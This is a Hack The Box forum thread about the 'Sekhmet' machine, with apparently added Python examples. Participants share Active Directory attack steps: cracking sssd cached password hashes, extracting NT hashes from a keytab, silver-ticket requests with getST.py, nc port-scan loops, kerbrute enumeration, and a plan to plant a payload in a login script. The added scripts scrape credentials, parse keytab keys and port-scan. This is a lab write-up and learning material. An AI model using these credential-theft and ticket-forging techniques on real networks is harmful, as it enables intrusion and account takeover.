Sekhmet - HTB [Discussion]
Question still remains... how to access the Windows box which is hosting this Linux webserver container...
Still searching around. Final flag is on Windows.
Reply
(September 15, 2022, 07:33 PM)Hacker2222 Wrote:
(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure how to proceed next

After inspecting the ldb file, you can find the domain SID, a domain user and the credential hash:
/var/lib/sss/db/cache_windcorp.htb.ldb


The credential hash can be john'd to reveal the password of the domain user.
From there, you can also do impersonation to get an Administrator.ccache.

But the thing is, from the DNS zone transfer and other info found, there are only two hosts in the domain, webserver and hope, and neither of them has any of the SMB or LDAP ports open. I'm starting to wonder where to proceed next.

It is curious, though, which host is serving the SSH port; it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.


I think you can use the password of ray.duncan to log in with SSH? The container has kinit, and you can log in using kinit ray.duncan then ssh -k to log in? SSH login as ray.duncan does not work though.......
(September 16, 2022, 08:38 AM)onl1_f4ns Wrote: Question still remains... how to access the Windows box which is hosting this Linux webserver container...
Still searching around. Final flag is on Windows.


You can request a silver ticket as ray.duncan and access the SMB share.
There is a share folder where you'll find a number of debug users.
I'm trying to figure out what the logical next step with those debug users is.

# request ticket
> getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/ray.duncan:passs'
> export KRB5CCNAME=ray.duncan.ccache
> proxychains smbclient.py ray.duncan@hope.windcorp.htb -k -no-pass
Reply
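An added example, not code from anyone in the thread, of pulling what Hacker2222 describes out of a copied sssd cache file. sssd's cache is an ldb database (tdb on disk); the proper reader is `ldbsearch -H cache_windcorp.htb.ldb` from ldb-tools. This script does by hand what `strings | grep` would: it finds each user record DN and the objectSIDString and cachedPassword values stored after it, then writes john input. The blob, the sha512crypt value, the SID and the second user `jdoe` are all constructed for the example; the only assumption about real files is that a packed ldb record's attribute values follow its DN.

```python
"""Scrape cached domain credentials out of a copy of the sssd cache file."""
import re

# sssd sysdb user DN: name=<user>@<domain>,cn=users,cn=<domain>,cn=sysdb
DN_RE = re.compile(rb"name=([^,\x00@]+)@([^,\x00]+),cn=users,cn=[^,\x00]+,cn=sysdb")
# sha512crypt as stored in cachedPassword: $6$[rounds=N$]<salt, up to 16>$<86 chars>
SHA512CRYPT_RE = re.compile(rb"\$6\$(?:rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}")
SID_RE = re.compile(rb"S-1-5-21-\d+-\d+-\d+-\d+")


def extract_cached_creds(blob: bytes) -> list:
    """One dict per user DN found. Assumes a record's attribute values sit
    between its DN and the next DN, which is how ldb packs records."""
    dns = list(DN_RE.finditer(blob))
    creds = []
    for i, m in enumerate(dns):
        chunk = blob[m.end(): dns[i + 1].start() if i + 1 < len(dns) else len(blob)]
        sid = SID_RE.search(chunk)
        pw = SHA512CRYPT_RE.search(chunk)
        creds.append({
            "user": m.group(1).decode(),
            "domain": m.group(2).decode(),
            "sid": sid.group(0).decode() if sid else None,
            "cachedPassword": pw.group(0).decode() if pw else None,
        })
    return creds


def to_john(creds) -> str:
    """user:hash lines for john; crack with `john --format=sha512crypt`."""
    return "\n".join(f'{c["user"]}:{c["cachedPassword"]}' for c in creds if c["cachedPassword"])


# --- constructed sample: fake hash and SID, layout only loosely mimics a packed ldb record ---
FAKE_HASH = "$6$abcdefgh$" + ("Ab1/x9." * 13)[:86]
CONSTRUCTED_BLOB = (
    b"TDB file\n\x00\x00\x00"
    b"name=ray.duncan@windcorp.htb,cn=users,cn=windcorp.htb,cn=sysdb\x00"
    b"objectClass\x00user\x00"
    b"name\x00ray.duncan@windcorp.htb\x00"
    b"objectSIDString\x00S-1-5-21-1111111111-2222222222-3333333333-1105\x00"
    b"cachedPassword\x00" + FAKE_HASH.encode() + b"\x00"
    b"name=jdoe@windcorp.htb,cn=users,cn=windcorp.htb,cn=sysdb\x00"  # hypothetical user, never logged in
    b"objectClass\x00user\x00"
    b"objectSIDString\x00S-1-5-21-1111111111-2222222222-3333333333-1106\x00"
)

if __name__ == "__main__":
    found = extract_cached_creds(CONSTRUCTED_BLOB)
    for c in found:
        print(c)
    print(to_john(found))
```

Only users who have actually logged in through sssd get a cachedPassword, so expect records with a SID but no hash; the domain SID is the SID minus its last RID component.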
(September 16, 2022, 09:13 AM)meowmeowattack Wrote:
You can request a silver ticket as rayn.duncan and access the SMB share.
There is a share folder where you'll find a number of debug users.
I'm trying to figure out what the logical next step with those debug users is.

# request ticket
> getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/rayn.duncan:passs'
> export KRB5CCNAME=rayn.duncan.ccache
> proxychains smbclient.py rayn.duncan@hope.windcorp.htb -k -no-pass


Also looking around... and it is better not to share any creds in plain text, please.
Most people won't even try this box. They are waiting for a readily available write-up..
Reply
(September 16, 2022, 11:00 AM)onl1_f4ns Wrote:
Also looking around... and it is better not to share any creds in plain text, please.
Most people won't even try this box. They are waiting for a readily available write-up..


Oh, missed that, removed now.

Further digging found a krb5.keytab file, and I can get the NTLM hash for webserver$, but since NTLM is disabled on the DC, I can't think of much to do here.
There is WSMan (5985) running on the DC; I'm aware of an exploit targeting this, but the endpoint seems to require auth:
HTTP/1.1 401 
Server: Microsoft-HTTPAPI/2.0
WWW-Authenticate: Negotiate
WWW-Authenticate: Kerberos
Date: Fri, 16 Sep 2022 11:06:45 GMT
Connection: close
Content-Length: 0
Reply
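An added example, not code from the thread, of what "get the NTLM hash from krb5.keytab" means mechanically: a parser for the MIT keytab format (version 0x0502), which is what a Linux host joined with realmd/adcli writes. For enctype 23 (rc4-hmac) the 16-byte key in the entry is literally the account's NT hash; enctype 18 is the AES256 key. The keytab bytes below are constructed with fake keys (the `00112233...` value is not a real hash), and a deleted slot is included to show how the parser skips it. Whether a key like this is still useful when NTLM is disabled depends on the DC: it is a Kerberos key, so the question is which enctypes the KDC accepts, not whether NTLM authentication is on.

```python
"""Parse an MIT Kerberos keytab (format 0x0502) and list the keys it holds."""
import struct

ENCTYPE_NAMES = {
    1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
    17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
    23: "rc4-hmac", 24: "rc4-hmac-exp",
}


def _counted(buf: bytes, off: int):
    """keytab counted_octet_string: uint16 big-endian length, then the bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n


def parse_keytab(data: bytes) -> list:
    """Return one dict per live entry: principal, enctype, kvno, key_hex, timestamp."""
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab format 0x0502 is handled")
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size <= 0:                      # negative size marks a deleted slot of |size| bytes
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        p = off + 2
        realm, p = _counted(data, p)
        comps = []
        for _ in range(ncomp):
            c, p = _counted(data, p)
            comps.append(c.decode())
        name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, p)
        p += 9
        (etype,) = struct.unpack_from(">H", data, p)
        p += 2
        key, p = _counted(data, p)
        kvno = vno8
        if end - p >= 4:                   # optional 32-bit kvno overrides the 8-bit field
            (vno32,) = struct.unpack_from(">I", data, p)
            if vno32:
                kvno = vno32
        entries.append({
            "principal": "/".join(comps) + "@" + realm.decode(),
            "name_type": name_type,
            "timestamp": timestamp,
            "enctype": etype,
            "enctype_name": ENCTYPE_NAMES.get(etype, f"etype-{etype}"),
            "kvno": kvno,
            "key_hex": key.hex(),
        })
        off = end
    return entries


def nt_hashes(entries) -> dict:
    """rc4-hmac (etype 23) keys are the account's NT hash, byte for byte."""
    return {e["principal"]: e["key_hex"] for e in entries if e["enctype"] == 23}


# --- constructed sample keytab with fake key material -----------------------------------
def _cstr(b: bytes) -> bytes:
    return struct.pack(">H", len(b)) + b


def build_entry(realm, components, enctype, key, kvno, timestamp=1651449600, name_type=1):
    body = struct.pack(">H", len(components)) + _cstr(realm.encode())
    for c in components:
        body += _cstr(c.encode())
    body += struct.pack(">IIB", name_type, timestamp, kvno & 0xFF)
    body += struct.pack(">H", enctype) + _cstr(key)
    body += struct.pack(">I", kvno)
    return struct.pack(">i", len(body)) + body


FAKE_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")   # not a real hash
FAKE_AES256 = bytes(range(32))                                      # not a real key
CONSTRUCTED_KEYTAB = (
    b"\x05\x02"
    + build_entry("WINDCORP.HTB", ["WEBSERVER$"], 23, FAKE_NT_HASH, kvno=2)
    + struct.pack(">i", -8) + b"\x00" * 8                           # a deleted slot
    + build_entry("WINDCORP.HTB", ["host", "webserver.windcorp.htb"], 18, FAKE_AES256, kvno=2)
)

if __name__ == "__main__":
    for e in parse_keytab(CONSTRUCTED_KEYTAB):
        print(f'{e["principal"]:45} kvno={e["kvno"]} {e["enctype_name"]:24} {e["key_hex"]}')
```

`klist -kte /etc/krb5.keytab` shows the same principals and enctypes without the key bytes; the parser is for when you have copied the file off the box and want the keys themselves.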
In one of the shares I found this:
[code]
# cat Shortcuts.xml
[/code]
and this:
[code]
# ls
drw-rw-rw- 0 Mon May 2 02:11:24 2022 .
drw-rw-rw- 0 Mon Apr 25 14:59:55 2022 ..
drw-rw-rw- 0 Sun May 1 07:20:07 2022 {176474A3-B14C-4258-AA1D-14B9A9CC6BB8}
drw-rw-rw- 0 Mon Apr 25 14:58:44 2022 {31B2F340-016D-11D2-945F-00C04FB984F9}
drw-rw-rw- 0 Sun May 1 08:14:40 2022 {39A80DAA-D083-4C62-B751-C9049DFAECF0}
drw-rw-rw- 0 Mon May 2 02:11:24 2022 {49AEF240-0D5C-4E3F-A511-1D72BF02AE83}
drw-rw-rw- 0 Tue Apr 26 14:16:21 2022 {4C9B273B-C7BA-4F39-BECC-10C8C39D7092}
drw-rw-rw- 0 Mon May 2 01:30:29 2022 {588D7984-374C-4F19-A96A-AE50B9E43BD0}
drw-rw-rw- 0 Mon Apr 25 14:58:44 2022 {6AC1786C-016F-11D2-945F-00C04fB984F9}
# cd ..
# ls
drw-rw-rw- 0 Mon Apr 25 14:59:55 2022 .
drw-rw-rw- 0 Thu Apr 28 13:58:26 2022 ..
drw-rw-rw- 0 Wed Sep 14 13:03:31 2022 DfsrPrivate
drw-rw-rw- 0 Mon May 2 02:11:24 2022 Policies
drw-rw-rw- 0 Mon May 2 01:49:18 2022 scripts
# cd scripts
# ls
drw-rw-rw- 0 Mon May 2 01:49:18 2022 .
drw-rw-rw- 0 Mon Apr 25 14:59:55 2022 ..
-rw-rw-rw- 2124 Mon May 2 00:47:14 2022 form.ps1
-rw-rw-rw- 2710 Mon May 2 01:49:18 2022 Update phone.lnk
-rw-rw-rw- 47774 Sun May 1 15:45:21 2022 windcorp-logo.png
# pwd
\windcorp.htb\scripts
#
[/code]
So, if we can write to and modify this form.ps1 script to include our payload and then somehow trigger Update phone.lnk (or some other way)... we may potentially get RCE on the Windows box finally. Just trying..
Reply
(September 16, 2022, 11:16 AM)meowmeowattack Wrote: Oh, missed that, removed now.

Further digging found a krb5.keytab file, and I can get the NTLM hash for webserver$, but since NTLM is disabled on the DC, I can't think of much to do here.
There is WSMan (5985) running on the DC; I'm aware of an exploit targeting this, but the endpoint seems to require auth:


Where did you find (5985)?? I don't see it.

Nmap scan report for hope.windcorp.htb (192.168.0.2)
Host is up (0.00051s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-16 17:19:03Z)
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/16%Time=6324B00C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: 00:15:5D:10:93:01 (Microsoft)
Service Info: Host: HOPE; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-09-16T17:21:23
|_  start_date: N/A
Reply
(September 16, 2022, 05:43 PM)onl1_f4ns Wrote:
Where did you find (5985)?? I don't see it.


I didn't use nmap; instead I used a self-written bash one-liner that utilises nc -w 1 -z to do port scanning. This is handy on the pivot when nmap proxying isn't working as intended.

for p in {1..65535}; do nc -vn 192.168.0.2 $p -w 1 -z & done 2> output.txt


I also saw the form and the lnk file, but the shares are not writable, hence I didn't think any further in that direction.
Reply
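An added example, not code from the thread, for the same situation as the nc loop above: scanning from a pivot where nmap through a proxy misbehaves. It keeps a bounded number of connections in flight instead of forking one nc per port, and it separates the three outcomes that matter when reading results like the nmap output earlier in the thread: a refused connection (closed), a completed handshake (open) and no answer at all (filtered). It connects directly; proxying is left to whatever tunnel the caller has set up. The self-test at the bottom only touches localhost.

```python
"""Bounded-concurrency TCP connect scan that tells open, closed and filtered apart."""
import asyncio
import socket


async def probe(host: str, port: int, timeout: float) -> tuple:
    """One connect attempt: refused -> closed, no answer in time -> filtered."""
    try:
        reader, writer = await asyncio.wait_for(asyncio.open_connection(host, port), timeout)
    except asyncio.TimeoutError:
        return port, "filtered"
    except ConnectionRefusedError:
        return port, "closed"
    except OSError:                        # host/network unreachable and similar
        return port, "filtered"
    writer.close()
    try:
        await writer.wait_closed()
    except OSError:
        pass
    return port, "open"


async def scan(host: str, ports, timeout: float = 1.0, concurrency: int = 256) -> dict:
    """Probe all ports with at most `concurrency` connections in flight."""
    sem = asyncio.Semaphore(concurrency)

    async def guarded(p):
        async with sem:
            return await probe(host, p, timeout)

    return dict(await asyncio.gather(*(guarded(p) for p in ports)))


def scan_sync(host: str, ports, timeout: float = 1.0, concurrency: int = 256) -> dict:
    return asyncio.run(scan(host, ports, timeout, concurrency))


def open_ports(results: dict) -> list:
    return sorted(p for p, state in results.items() if state == "open")


def demo_scan_localhost() -> tuple:
    """Self-test: one listening ephemeral port and one port just released."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                            # nobody listens here now -> RST -> "closed"
    try:
        results = scan_sync("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
    return results[open_port], results[closed_port]


if __name__ == "__main__":
    print(demo_scan_localhost())
    # e.g. scan_sync("192.168.0.2", range(1, 65536), timeout=1.0, concurrency=512)
```

A mostly "filtered" result set, as in the nmap output above, means the timeout is doing the work, so the total run time is roughly ports × timeout ÷ concurrency; raise concurrency rather than lowering the timeout when going through a slow tunnel, or refused ports start showing up as filtered.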
Verified with kerbrute that all users from debug-users.txt are legit on the box.
Will try to brute their passwords... maybe I'll get a hit.
Reply
(September 16, 2022, 08:32 PM)onl1_f4ns Wrote: Verified with kerbrute that all users from debug-users.txt are legit on the box.
Will try to brute their passwords... maybe I'll get a hit.


Don't bruteforce, account lockout is enforced!
Reply
(September 16, 2022, 08:56 PM)Hacker2222 Wrote: LDAP search on the box......... maybe useful?


Were you able to bypass the SSL issue?

"The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection"
Reply

